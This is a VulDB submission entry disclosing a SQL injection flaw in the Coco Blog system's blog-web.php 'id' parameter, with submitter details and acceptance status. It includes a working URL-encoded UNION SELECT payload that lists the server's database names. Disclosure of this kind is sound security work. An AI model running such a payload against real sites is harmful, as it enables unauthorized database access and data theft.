| 标题 | coco-Blog-sql injection |
|---|
| 描述 | Coco Blog is an open source personal blog system, but there is a very serious SQL injection vulnerability in the system when reading article data. This vulnerability can cause the database to be removed, the victim's information to be disclosed, and even upload a Trojan horse to the target server, resulting in server intrusion.
The location of the vulnerability is http://www.localhost/coco-Blog/blog-web.php?id=12
The test code is
http://www.localhost/coco-Blog/blog-web.php?id=-12%27%20union%20select%201,(SELECT%20GROUP_CONCAT(schema_name)%20FROM%20information_schema.schemata)%20--+ |
|---|
| 来源 | ⚠️ https://blog.csdn.net/akucoco/article/details/129754626?spm=1001.2014.3001.5501 |
|---|
| 用户 | joben (UID 43447) |
|---|
| 提交 | 2023-03-24 10時14分 (3 年前) |
|---|
| 管理 | 2023-03-25 17時29分 (1 day later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 224015 [cojoben Coco Blog blog-web.php 标识符 SQL注入] |
|---|
| 积分 | 19 |
|---|